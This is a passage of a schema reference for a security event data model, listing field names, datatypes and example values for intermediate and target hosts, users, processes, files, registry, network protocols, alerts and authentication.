Dataclass Scalar
Examples Asia/Tokyo
Enriched True
xdm.intermediate.agent
xdm.intermediate.agent.identifier
Datatype String
Dataclass Scalar
xdm.intermediate.agent.type
Datatype XDM_CONST.AGENT_TYPE
Dataclass Scalar
xdm.intermediate.agent.version
Datatype String
Dataclass Scalar
xdm.intermediate.agent.content_version
Datatype String
Dataclass Scalar
xdm.intermediate.agent.installation_time
Datatype Timestamp
Dataclass Scalar
xdm.intermediate.user
xdm.intermediate.user.identifier
Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the intermediate user.
Datatype String
Dataclass Scalar
xdm.intermediate.user.username
Description The user name used for identification of the intermediate user.
Datatype String
Dataclass Scalar
xdm.intermediate.user.user_type
Datatype XDM_CONST.USER_TYPE
Dataclass Scalar
xdm.intermediate.user.first_name
Datatype String
Dataclass Scalar
xdm.intermediate.user.last_name
Datatype String
Dataclass Scalar
xdm.intermediate.user.middle_name
Datatype String
Dataclass Scalar
xdm.intermediate.user.employee_id
Datatype String
Dataclass Scalar
xdm.intermediate.user.badge_id
Datatype String
Dataclass Scalar
xdm.intermediate.user.ou
Datatype String
Dataclass Scalar
xdm.intermediate.user.domain
Datatype String
Dataclass Scalar
xdm.intermediate.user.is_password_changeable
Datatype Boolean
Dataclass Scalar
xdm.intermediate.user.is_password_expired
Datatype Boolean
Dataclass Scalar
xdm.intermediate.user.is_password_required
Datatype Boolean
Dataclass Scalar
xdm.intermediate.user.is_disabled
Datatype Boolean
Dataclass Scalar
xdm.intermediate.user.groups
Datatype String
Dataclass Array
xdm.intermediate.user.netbios_domain
Description The NetBIOS subdomain of the DNS domain name of the intermediate user. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).
Datatype String
Dataclass Scalar
Examples mycompany
Enriched True
xdm.intermediate.user.sam_account_name
Description The logon name of the intermediate user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples jondoe
Enriched True
xdm.intermediate.user.upn
Description The principal name of the intermediate user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples [email protected]
Enriched True
xdm.intermediate.user.identity_type
Datatype XDM_CONST.IDENTITY_TYPE
Dataclass Scalar
Enriched True
xdm.intermediate.user.scope
Datatype XDM_CONST.SCOPE_TYPE
Dataclass Scalar
Enriched True
xdm.intermediate.process
xdm.intermediate.process.name
Datatype String
Dataclass Scalar
xdm.intermediate.process.pid
Datatype Number
Dataclass Scalar
xdm.intermediate.process.identifier
Datatype String
Dataclass Scalar
xdm.intermediate.process.command_line
Datatype String
Dataclass Scalar
xdm.intermediate.process.causality_id
Description The ID of the root process that triggered the chain that the intermediate process is a part of.
Datatype String
Dataclass Scalar
xdm.intermediate.process.parent_id
Description The ID of the direct parent process that triggered the intermediate process.
Datatype String
Dataclass Scalar
xdm.intermediate.process.integrity_level
Description The mode of operation level in which the intermediate process is running.
Datatype Number
Dataclass Scalar
xdm.intermediate.process.executable
xdm.intermediate.process.executable.filename
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.path
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.directory
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.extension
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.file_type
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.md5
Description The MD5 hash signature for the intermediate process executable content.
Datatype MD5
Dataclass Scalar
xdm.intermediate.process.executable.sha256
Description The SHA256 hash signature for the intermediate process executable content.
Datatype SHA256
Dataclass Scalar
xdm.intermediate.process.executable.is_signed
Description Whether the loaded module of the intermediate process executable is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.intermediate.process.executable.signer
Datatype String
Dataclass Scalar
xdm.intermediate.process.executable.signature_status
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.intermediate.process.executable.size
Datatype Number
Dataclass Scalar
xdm.intermediate.process.thread_id
Datatype Number
Dataclass Scalar
xdm.intermediate.process.is_injected
Description Whether the intermediate process's thread/activity is executed via process injection.
Datatype Boolean
Dataclass Scalar
xdm.intermediate.process.container_id
Datatype String
Dataclass Scalar
xdm.intermediate.user_agent
Datatype String
Dataclass Scalar
xdm.intermediate.application
xdm.intermediate.application.name
Description The name of the intermediate application that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.application.version
Description The version of the intermediate application that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.application.publisher
Description The publisher (vendor/company) of the intermediate application that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.application.installation_timestamp
Description The installation time of the intermediate application that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.application.from_appstore
Description Whether the intermediate application that handled the activity was installed from an application store.
Datatype Boolean
Dataclass Scalar
xdm.intermediate.ipv4
Datatype IPv4
Dataclass Scalar
xdm.intermediate.ipv6
Datatype IPv6
Dataclass Scalar
xdm.intermediate.asn
xdm.intermediate.asn.as_number
Description The autonomous system number (ASN) of the intermediate IP address (auto-enriched field).
Datatype Number
Dataclass Scalar
Examples 54538
Enriched True
xdm.intermediate.asn.as_name
Description The autonomous system name of the intermediate IP address (auto-enriched field).
Datatype String
Dataclass Scalar
Enriched True
xdm.intermediate.asn.isp
Datatype String
Dataclass Scalar
xdm.intermediate.asn.domain
Datatype String
Dataclass Scalar
xdm.intermediate.asn.is_proxy
Description Indicates whether the autonomous system of the intermediate IP address is a proxy/VPN address (auto-enriched field).
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.intermediate.is_internal_ip
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.intermediate.port
Datatype Number
Dataclass Scalar
xdm.intermediate.cloud
xdm.intermediate.cloud.provider
Datatype XDM_CONST.CLOUD_PROVIDER
Dataclass Scalar
xdm.intermediate.cloud.geo_region
Datatype String
Dataclass Scalar
xdm.intermediate.cloud.region
Datatype String
Dataclass Scalar
xdm.intermediate.cloud.zone
Description The cloud zone (sub-region) within a given region of the cloud provider.
Datatype String
Dataclass Scalar
Examples us-east-1a
xdm.intermediate.cloud.project
Datatype String
Dataclass Scalar
xdm.intermediate.cloud.project_hierarchy
Datatype String
Dataclass Array
xdm.intermediate.cloud.project_id
Datatype String
Dataclass Scalar
xdm.intermediate.is_proxy
Datatype Boolean
Dataclass Scalar
xdm.intermediate.is_nat
Datatype Boolean
Dataclass Scalar
5.5 | xdm.target
Information about the target of the activity
xdm.target.host
xdm.target.host.hostname
Datatype String
Dataclass Scalar
xdm.target.host.os_family
Datatype XDM_CONST.OS_FAMILY
Dataclass Scalar
xdm.target.host.os
Description The specific operating system of the target host of the activity, including version.
Datatype String
Dataclass Scalar
xdm.target.host.fqdn
Description The fully-qualified domain name (FQDN) of the target host of the activity.
Datatype String
Dataclass Scalar
xdm.target.host.device_category
Datatype String
Dataclass Scalar
xdm.target.host.device_model
Datatype String
Dataclass Scalar
xdm.target.host.device_id
Datatype String
Dataclass Scalar
xdm.target.host.ipv4_addresses
Datatype IPv4
Dataclass Array
xdm.target.host.ipv6_addresses
Datatype IPv6
Dataclass Array
xdm.target.host.ipv4_public_addresses
Description The IPv4 public addresses of the target host of the activity.
Datatype IPv4
Dataclass Array
xdm.target.host.ipv6_public_addresses
Description The IPv6 public addresses of the target host of the activity.
Datatype IPv6
Dataclass Array
xdm.target.host.mac_addresses
Datatype String
Dataclass Array
xdm.target.host.manufacturer
Datatype String
Dataclass Scalar
xdm.target.host.hardware_uuid
Description The unique hardware manufacturing ID of the target host of the activity.
Datatype String
Dataclass Scalar
xdm.target.host.boot_time
Description The last known start up time of the target host of the activity.
Datatype Timestamp
Dataclass Scalar
xdm.target.host.image
Datatype String
Dataclass Scalar
xdm.target.host.memory
Description The memory capacity size in bytes of the target host of the activity.
Datatype Number
Dataclass Scalar
xdm.target.agent
xdm.target.agent.identifier
Description The ID of the agent on the target host.
Datatype String
Dataclass Scalar
xdm.target.agent.type
Datatype XDM_CONST.AGENT_TYPE
Dataclass Scalar
xdm.target.agent.version
Datatype String
Dataclass Scalar
xdm.target.agent.content_version
Datatype String
Dataclass Scalar
xdm.target.agent.installation_time
Datatype Timestamp
Dataclass Scalar
xdm.target.user
xdm.target.user.identifier
Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the target user.
Datatype String
Dataclass Scalar
xdm.target.user.username
Description The user name used for identification of the target user.
Datatype String
Dataclass Scalar
xdm.target.user.user_type
Datatype XDM_CONST.USER_TYPE
Dataclass Scalar
xdm.target.user.first_name
Datatype String
Dataclass Scalar
xdm.target.user.last_name
Datatype String
Dataclass Scalar
xdm.target.user.middle_name
Description The middle name of the target user.
Datatype String
Dataclass Scalar
xdm.target.user.employee_id
Datatype String
Dataclass Scalar
xdm.target.user.badge_id
Datatype String
Dataclass Scalar
xdm.target.user.ou
Datatype String
Dataclass Scalar
xdm.target.user.domain
Datatype String
Dataclass Scalar
xdm.target.user.is_password_changeable
Datatype Boolean
Dataclass Scalar
xdm.target.user.is_password_expired
Datatype Boolean
Dataclass Scalar
xdm.target.user.is_password_required
Datatype Boolean
Dataclass Scalar
xdm.target.user.is_disabled
Datatype Boolean
Dataclass Scalar
xdm.target.user.groups
Datatype String
Dataclass Array
xdm.target.user.netbios_domain
Description The NetBIOS subdomain of the DNS domain name of the target user. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).
Datatype String
Dataclass Scalar
Examples mycompany
Enriched True
xdm.target.user.sam_account_name
Description The logon name of the target user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples jondoe
Enriched True
xdm.target.user.upn
Description The principal name of the target user. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples [email protected]
Enriched True
xdm.target.user.identity_type
Datatype XDM_CONST.IDENTITY_TYPE
Dataclass Scalar
Enriched True
xdm.target.user.scope
Datatype XDM_CONST.SCOPE_TYPE
Dataclass Scalar
Enriched True
xdm.target.location
xdm.target.location.country
Datatype String
Dataclass Scalar
Examples Japan
Enriched True
xdm.target.location.city
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.target.location.continent
Datatype String
Dataclass Scalar
Examples Asia
Enriched True
xdm.target.location.region
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.target.location.latitude
Datatype Float
Dataclass Scalar
Examples 45.505918
Enriched True
xdm.target.location.longitude
Datatype Float
Dataclass Scalar
Examples -73.61483
Enriched True
xdm.target.location.timezone
Datatype String
Dataclass Scalar
Examples Asia/Tokyo
Enriched True
xdm.target.process
xdm.target.process.name
Datatype String
Dataclass Scalar
xdm.target.process.pid
Datatype Number
Dataclass Scalar
xdm.target.process.identifier
Datatype String
Dataclass Scalar
xdm.target.process.command_line
Datatype String
Dataclass Scalar
xdm.target.process.causality_id
Description The ID of the root process that triggered the chain that the target process is a part of.
Datatype String
Dataclass Scalar
xdm.target.process.parent_id
Description The ID of the direct parent process that triggered the target process.
Datatype String
Dataclass Scalar
xdm.target.process.integrity_level
Description The mode of operation level in which the target process is running.
Datatype Number
Dataclass Scalar
xdm.target.process.executable
xdm.target.process.executable.filename
Datatype String
Dataclass Scalar
xdm.target.process.executable.path
Datatype String
Dataclass Scalar
xdm.target.process.executable.directory
Datatype String
Dataclass Scalar
xdm.target.process.executable.extension
Datatype String
Dataclass Scalar
xdm.target.process.executable.file_type
Datatype String
Dataclass Scalar
xdm.target.process.executable.md5
Description The MD5 hash signature for the target process executable content.
Datatype MD5
Dataclass Scalar
xdm.target.process.executable.sha256
Description The SHA256 hash signature for the target process executable content.
Datatype SHA256
Dataclass Scalar
xdm.target.process.executable.is_signed
Description Whether the loaded module of the target process executable is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.target.process.executable.signer
Datatype String
Dataclass Scalar
xdm.target.process.executable.signature_status
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.target.process.executable.size
Datatype Number
Dataclass Scalar
xdm.target.process.thread_id
Datatype Number
Dataclass Scalar
xdm.target.process.is_injected
Description Whether the target process's thread/activity is executed via process injection.
Datatype Boolean
Dataclass Scalar
xdm.target.process.container_id
Datatype String
Dataclass Scalar
xdm.target.application
xdm.target.application.name
Datatype String
Dataclass Scalar
xdm.target.application.version
Datatype String
Dataclass Scalar
xdm.target.application.publisher
Datatype String
Dataclass Scalar
xdm.target.application.installation_timestamp
Datatype String
Dataclass Scalar
xdm.target.application.from_appstore
Description Whether the target application was installed from an application store.
Datatype Boolean
Dataclass Scalar
xdm.target.ipv4
Datatype IPv4
Dataclass Scalar
xdm.target.ipv6
Datatype IPv6
Dataclass Scalar
xdm.target.asn
xdm.target.asn.as_number
Description The autonomous system number (ASN) of the target IP address (auto-enriched field).
Datatype Number
Dataclass Scalar
Examples 54538
Enriched True
xdm.target.asn.as_name
Description The autonomous system name of the target IP address (auto-enriched field).
Datatype String
Dataclass Scalar
Enriched True
xdm.target.asn.isp
Datatype String
Dataclass Scalar
xdm.target.asn.domain
Datatype String
Dataclass Scalar
xdm.target.asn.is_proxy
Description Indicates whether the autonomous system of the target IP address is a proxy/VPN address (auto-enriched field).
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.target.is_internal_ip
Description Whether the target IP address is internal (auto-enriched field).
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.target.port
Datatype Number
Dataclass Scalar
xdm.target.sent_bytes
Datatype Number
Dataclass Scalar
xdm.target.sent_packets
Datatype Number
Dataclass Scalar
xdm.target.interface
Datatype String
Dataclass Scalar
xdm.target.zone
Datatype String
Dataclass Scalar
xdm.target.subnet
Datatype String
Dataclass Scalar
xdm.target.vlan
Datatype Number
Dataclass Scalar
xdm.target.cloud
xdm.target.cloud.provider
Datatype XDM_CONST.CLOUD_PROVIDER
Dataclass Scalar
xdm.target.cloud.geo_region
Datatype String
Dataclass Scalar
xdm.target.cloud.region
Datatype String
Dataclass Scalar
xdm.target.cloud.zone
Description The cloud zone (sub-region) within a given region of the cloud provider.
Datatype String
Dataclass Scalar
Examples us-east-1a
xdm.target.cloud.project
Datatype String
Dataclass Scalar
xdm.target.cloud.project_hierarchy
Datatype String
Dataclass Array
xdm.target.cloud.project_id
Datatype String
Dataclass Scalar
xdm.target.module
xdm.target.module.filename
Description The file name of the target module (loaded, unloaded, etc.).
Datatype String
Dataclass Scalar
xdm.target.module.path
Description The file path of the target module (loaded, unloaded, etc.).
Datatype String
Dataclass Scalar
xdm.target.module.directory
Description The file directory of the target module (loaded, unloaded, etc.).
Datatype String
Dataclass Scalar
xdm.target.module.extension
Description The file extension of the target module (loaded, unloaded, etc.).
Datatype String
Dataclass Scalar
xdm.target.module.file_type
Description The file type of the target module (loaded, unloaded, etc.).
Datatype String
Dataclass Scalar
xdm.target.module.md5
Description The MD5 hash signature of the content of the target module (loaded, unloaded, etc.).
Datatype MD5
Dataclass Scalar
xdm.target.module.sha256
Description The SHA256 hash signature of the content of the target module (loaded, unloaded, etc.).
Datatype SHA256
Dataclass Scalar
xdm.target.module.is_signed
Description Whether the loaded module of the target module (loaded, unloaded, etc.) is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.target.module.signer
Datatype String
Dataclass Scalar
xdm.target.module.signature_status
Description The signature status of the target module (loaded, unloaded, etc.).
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.target.module.size
Datatype Number
Dataclass Scalar
xdm.target.registry
A registry contains information, settings, options, and other values for programs and hardware installed on all versions of Microsoft Windows operating systems.
xdm.target.registry.key
Description The registry key that is associated with the operation, normalized to standard root key naming conventions.
Datatype String
Dataclass Scalar
Examples HKEY_LOCAL_MACHINE\SOFTWARE\MTG
xdm.target.registry.value
Description The registry value that is associated with the operation. Registry values are similar to files in file systems.
Datatype String
Dataclass Scalar
xdm.target.registry.value_type
Datatype XDM_CONST.REGISTRY_VALUE_TYPE
Dataclass Scalar
xdm.target.registry.data
Datatype String
Dataclass Scalar
Examples C:\Windows\system32;C:\Windows;
xdm.target.registry_before
xdm.target.registry_before.key
Description The registry key before the action that is associated with the operation, normalized to standard root key naming conventions.
Datatype String
Dataclass Scalar
Examples HKEY_LOCAL_MACHINE\SOFTWARE\MTG
xdm.target.registry_before.value
Description The registry value before the action that is associated with the operation. Registry values are similar to files in file systems.
Datatype String
Dataclass Scalar
xdm.target.registry_before.value_type
Datatype XDM_CONST.REGISTRY_VALUE_TYPE
Dataclass Scalar
xdm.target.registry_before.data
Description The data stored in the registry value before the action.
Datatype String
Dataclass Scalar
Examples C:\Windows\system32;C:\Windows;
xdm.target.file
xdm.target.file.filename
Description The file name of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.path
Description The file path of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.directory
Description The file directory of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.extension
Description The file extension of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.file_type
Description The file type of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.md5
Description The MD5 hash signature of the content of the file that has been created, modified, or deleted.
Datatype MD5
Dataclass Scalar
xdm.target.file.sha256
Description The SHA256 hash signature of the content of the file that has been created, modified, or deleted.
Datatype SHA256
Dataclass Scalar
xdm.target.file.is_signed
Description Whether the loaded module of the file that has been created, modified, or deleted is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.target.file.signer
Description The signer of the file that has been created, modified, or deleted.
Datatype String
Dataclass Scalar
xdm.target.file.signature_status
Description The signature status of the file that has been created, modified, or deleted.
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.target.file.size
Description Size in bytes of the file that has been created, modified, or deleted.
Datatype Number
Dataclass Scalar
xdm.target.file_before
xdm.target.file_before.filename
Datatype String
Dataclass Scalar
xdm.target.file_before.path
Datatype String
Dataclass Scalar
xdm.target.file_before.directory
Description The file directory of the file before the action.
Datatype String
Dataclass Scalar
xdm.target.file_before.extension
Datatype String
Dataclass Scalar
xdm.target.file_before.file_type
Datatype String
Dataclass Scalar
xdm.target.file_before.md5
Description The MD5 hash signature of the content of the file before the action.
Datatype MD5
Dataclass Scalar
xdm.target.file_before.sha256
Description The SHA256 hash signature of the content of the file before the action.
Datatype SHA256
Dataclass Scalar
xdm.target.file_before.is_signed
Description Whether the loaded module of the file before the action is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.target.file_before.signer
Datatype String
Dataclass Scalar
xdm.target.file_before.signature_status
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.target.file_before.size
Datatype Number
Dataclass Scalar
xdm.target.domain
Datatype String
Dataclass Scalar
xdm.target.url
Description The URL that the client tried to access.
Datatype String
Dataclass Scalar
xdm.target.resource
xdm.target.resource.id
Datatype String
Dataclass Scalar
xdm.target.resource.name
Datatype String
Dataclass Scalar
xdm.target.resource.parent_id
Datatype String
Dataclass Scalar
xdm.target.resource.type
Datatype String
Dataclass Scalar
xdm.target.resource.sub_type
Datatype String
Dataclass Scalar
xdm.target.resource.value
Datatype String
Dataclass Scalar
xdm.target.resource_before
xdm.target.resource_before.id
Datatype String
Dataclass Scalar
xdm.target.resource_before.name
Datatype String
Dataclass Scalar
xdm.target.resource_before.parent_id
Description The ID of the owner of the audited resource before the activity.
Datatype String
Dataclass Scalar
xdm.target.resource_before.type
Description The resource type before the activity.
Datatype String
Dataclass Scalar
xdm.target.resource_before.sub_type
Datatype String
Dataclass Scalar
xdm.target.resource_before.value
Datatype String
Dataclass Scalar
5.6 | xdm.observer
The device, agent, or data provider that observed and reported the event.
xdm.observer.vendor
Datatype String
Dataclass Scalar
Enriched True
xdm.observer.product
Datatype String
Dataclass Scalar
Enriched True
xdm.observer.type
Datatype String
Dataclass Scalar
xdm.observer.version
Datatype String
Dataclass Scalar
xdm.observer.content_version
Datatype String
Dataclass Scalar
xdm.observer.unique_identifier
Datatype String
Dataclass Scalar
xdm.observer.name
Description The name of the observing device. Can be a host name, domain name, etc.
Datatype String
Dataclass Scalar
xdm.observer.action
Description The action that the observer performed related to the activity.
Datatype String
Dataclass Scalar
5.7 | xdm.alert
A potential threat or alert.
xdm.alert.category
Datatype XDM_CONST.THREAT_CATEGORY
Dataclass Scalar
xdm.alert.subcategory
Datatype String
Dataclass Scalar
xdm.alert.severity
Datatype String
Dataclass Scalar
xdm.alert.name
Datatype String
Dataclass Scalar
xdm.alert.description
Datatype String
Dataclass Scalar
xdm.alert.mitre_tactics
Description The threat tactics represent the 'why' of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.
Datatype XDM_CONST.MITRE_TACTIC
Dataclass Array
xdm.alert.mitre_techniques
Description The threat techniques represent 'how' an adversary achieves a tactical goal by performing an action. For example, an adversary may dump credentials to achieve credential access.
Datatype XDM_CONST.MITRE_TECHNIQUE
Dataclass Array
xdm.alert.original_threat_id
Datatype String
Dataclass Scalar
xdm.alert.original_threat_name
Description The threat's name as received from the source.
Datatype String
Dataclass Scalar
xdm.alert.original_alert_id
Description The specific alert ID, the instance of the threat, as received from the source.
Datatype String
Dataclass Scalar
xdm.alert.risks
Description A collection of potential risks, vulnerabilities, or suspicions that are associated with this alert or event.
Datatype String
Dataclass Array
5.8 | xdm.network
Event fields used to define metadata about network information seen in a typical OSI layer. This includes data from network monitoring devices/applications (NSM, firewall, IPS, IDS, etc.); cloud NetFlow; and network information from endpoints.
xdm.network.session_id
Datatype String
Dataclass Scalar
xdm.network.ip_protocol
Description The transport layer protocol in the OSI model, also known as the IP protocol.
Datatype XDM_CONST.IP_PROTOCOL
Dataclass Scalar
xdm.network.protocol_layers
Description The network protocols arranged by layers where the highest layer is last. For example, [IP, TCP, TLS, HTTP, INSTAGRAM].
Datatype String
Dataclass Array
xdm.network.application_protocol
Description Layer 7 (application) in the OSI model. Use https://applipedia.paloaltonetworks.com/ for app standardization.
Datatype String
Dataclass Scalar
xdm.network.application_protocol_category
Description The category of the Layer 7 (application) protocol. Use https://applipedia.paloaltonetworks.com/ for app standardization.
Datatype String
Dataclass Scalar
xdm.network.application_protocol_subcategory
Description The subcategory of the Layer 7 (application) protocol. Use https://applipedia.paloaltonetworks.com/ for app standardization.
Datatype String
Dataclass Scalar
xdm.network.rule
Description The name or ID of the rule by which the observer decided to act.
Datatype String
Dataclass Scalar
xdm.network.icmp
Internet Control Message Protocol (ICMP) specific fields.
xdm.network.icmp.type
Datatype Number
Dataclass Scalar
xdm.network.icmp.code
Datatype Number
Dataclass Scalar
xdm.network.dhcp
xdm.network.dhcp.ciaddr
Datatype IPv4
Dataclass Scalar
xdm.network.dhcp.yiaddr
Datatype IPv4
Dataclass Scalar
xdm.network.dhcp.siaddr
Datatype IPv4
Dataclass Scalar
xdm.network.dhcp.giaddr
Datatype IPv4
Dataclass Scalar
xdm.network.dhcp.chaddr
Datatype String
Dataclass Scalar
xdm.network.dhcp.sname
Description The server name from which the client wishes to boot.
Datatype String
Dataclass Scalar
xdm.network.dhcp.message_type
Datatype XDM_CONST.DHCP_MESSAGE_TYPE
Dataclass Scalar
xdm.network.dhcp.lease
Datatype Number
Dataclass Scalar
xdm.network.dhcp.client_hostname
Description The client hostname. See RFC2132, section 3.14.
Datatype String
Dataclass Scalar
xdm.network.dhcp.requested_address
Datatype String
Dataclass Scalar
xdm.network.dhcp.dns_server
Datatype String
Dataclass Array
xdm.network.dhcp.wins_server
Description The NetBIOS name server. DHCP option 44. See RFC2132.
Datatype String
Dataclass Array
xdm.network.dns
xdm.network.dns.is_response
Description Whether the event is a DNS response. See QR field from RFC1035.
Datatype Boolean
Dataclass Scalar
xdm.network.dns.opcode
Description The DNS OpCode used to specify the type of DNS query (e.g. QUERY, IQUERY, STATUS, etc.).
Datatype Number
Dataclass Scalar
xdm.network.dns.authoritative
Datatype Boolean
Dataclass Scalar
xdm.network.dns.is_truncated
Datatype Boolean
Dataclass Scalar
xdm.network.dns.response_code
Datatype XDM_CONST.DNS_RESPONSE_CODE
Dataclass Scalar
xdm.network.dns.dns_question
A DNS query is a request for information sent from a user's computer (DNS client) to a DNS server.
xdm.network.dns.dns_question.name
Datatype String
Dataclass Scalar
xdm.network.dns.dns_question.type
Description The code specifying the type of query.
Datatype XDM_CONST.DNS_RECORD_TYPE
Dataclass Scalar
xdm.network.dns.dns_question.class
Datatype Number
Dataclass Scalar
xdm.network.dns.dns_resource_record
A resource record, commonly referred to as an RR, is the unit of information entry in DNS zone files; RRs are the basic building blocks of host name and IP information and are used to resolve all DNS queries. Resource records come in a fairly wide variety of types in order to provide extended name-resolution services.
xdm.network.dns.dns_resource_record.name
Datatype String
Dataclass Scalar
xdm.network.dns.dns_resource_record.type
Datatype XDM_CONST.DNS_RECORD_TYPE
Dataclass Scalar
xdm.network.dns.dns_resource_record.class
Datatype Number
Dataclass Scalar
xdm.network.dns.dns_resource_record.value
Datatype String
Dataclass Scalar
xdm.network.http
xdm.network.http.referrer
Datatype String
Dataclass Scalar
xdm.network.http.url
Datatype String
Dataclass Scalar
xdm.network.http.url_category
Datatype XDM_CONST.URL_CATEGORY
Dataclass Scalar
xdm.network.http.domain
Datatype String
Dataclass Scalar
xdm.network.http.content_type
Datatype String
Dataclass Scalar
Examples application/json
xdm.network.http.browser
Datatype String
Dataclass Scalar
xdm.network.http.tld
Description The top level domain that this HTTP request is accessing.
Datatype String
Dataclass Scalar
xdm.network.http.method
Datatype XDM_CONST.HTTP_METHOD
Dataclass Scalar
xdm.network.http.response_code
Datatype XDM_CONST.HTTP_RSP_CODE
Dataclass Scalar
xdm.network.http.http_header
An HTTP header.
xdm.network.http.http_header.header
Datatype String
Dataclass Scalar
xdm.network.http.http_header.value
Datatype String
Dataclass Scalar
xdm.network.tls
xdm.network.tls.client_certificate
xdm.network.tls.client_certificate.version
Datatype String
Dataclass Scalar
xdm.network.tls.client_certificate.subject
Datatype String
Dataclass Scalar
xdm.network.tls.client_certificate.issuer
Datatype String
Dataclass Scalar
xdm.network.tls.client_certificate.serial
Description Unique identifier assigned to the certificate when it is issued. Used to distinguish the certificate from other certificates issued by the same certificate authority. The serial number is usually a positive integer encoded as an ASN.1 INTEGER value.
Datatype String
Dataclass Scalar
Examples 10:e6:fc:62:b7:41:8a:d5:00:5e:45:b6
xdm.network.tls.client_certificate.md5
Datatype MD5
Dataclass Scalar
xdm.network.tls.client_certificate.sha256
Datatype SHA256
Dataclass Scalar
xdm.network.tls.client_certificate.not_before
Datatype Timestamp
Dataclass Scalar
xdm.network.tls.client_certificate.not_after
Datatype Timestamp
Dataclass Scalar
xdm.network.tls.client_certificate.algorithm
Datatype String
Dataclass Scalar
xdm.network.tls.client_ja3
Datatype String
Dataclass Scalar
xdm.network.tls.server_name
Description The host name of the server to which the client is connecting.
Datatype String
Dataclass Scalar
xdm.network.tls.server_certificate
xdm.network.tls.server_certificate.version
Datatype String
Dataclass Scalar
xdm.network.tls.server_certificate.subject
Datatype String
Dataclass Scalar
xdm.network.tls.server_certificate.issuer
Datatype String
Dataclass Scalar
xdm.network.tls.server_certificate.serial
Description Unique identifier assigned to the certificate when it is issued. Used to distinguish the certificate from other certificates issued by the same certificate authority. The serial number is usually a positive integer encoded as an ASN.1 INTEGER value.
Datatype String
Dataclass Scalar
Examples 10:e6:fc:62:b7:41:8a:d5:00:5e:45:b6
xdm.network.tls.server_certificate.md5
Datatype MD5
Dataclass Scalar
xdm.network.tls.server_certificate.sha256
Datatype SHA256
Dataclass Scalar
xdm.network.tls.server_certificate.not_before
Datatype Timestamp
Dataclass Scalar
xdm.network.tls.server_certificate.not_after
Datatype Timestamp
Dataclass Scalar
xdm.network.tls.server_certificate.algorithm
Datatype String
Dataclass Scalar
xdm.network.tls.server_ja3
Datatype String
Dataclass Scalar
xdm.network.tls.cipher
Datatype String
Dataclass Scalar
xdm.network.tls.protocol_version
Description The TLS version.
Datatype String
Dataclass Scalar
xdm.network.dcerpc
xdm.network.dcerpc.operation
Datatype XDM_CONST.DCERPC_OPERATION
Dataclass Scalar
xdm.network.dcerpc.interface_uuid
Datatype String
Dataclass Scalar
xdm.network.dcerpc.opnum
Datatype Number
Dataclass Scalar
xdm.network.dcerpc.svcctl_buffer
Datatype String
Dataclass Scalar
xdm.network.ldap
xdm.network.ldap.operation
Datatype XDM_CONST.LDAP_OPERATION
Dataclass Scalar
xdm.network.ldap.scope
Datatype XDM_CONST.LDAP_SCOPE
Dataclass Scalar
xdm.network.ldap.filter
Description The filter defining the criteria used to identify entries in search requests.
Datatype String
Dataclass Scalar
xdm.network.ldap.attributes
Datatype String
Dataclass Array
xdm.network.ldap.returned_entries
Dataclass Scalar
xdm.network.ldap.bind_auth_type
Datatype XDM_CONST.LDAP_BIND_AUTH_TYPE
Dataclass Scalar
xdm.network.vpn
VPN fields.
xdm.network.vpn.allocated_ipv4
Description The IPv4 address that is allocated to the source by the VPN server.
Datatype IPv4
Dataclass Scalar
xdm.network.vpn.allocated_ipv6
Description The IPv6 address that is allocated to the source by the VPN server.
Datatype IPv6
Dataclass Scalar
5.9 | xdm.auth
The Auth section is used for both authentication and authorization attempts, such as Kerberos, NTLM, OAuth2, Login, MFA, or SSO. For authentication/authorization observed over the network or from endpoint data, it is preferred to use the Auth section.
xdm.auth.service
Datatype String
Dataclass Scalar
xdm.auth.auth_method
Datatype String
Dataclass Scalar
xdm.auth.privilege_level
Datatype XDM_CONST.PRIVILEGE_LEVEL
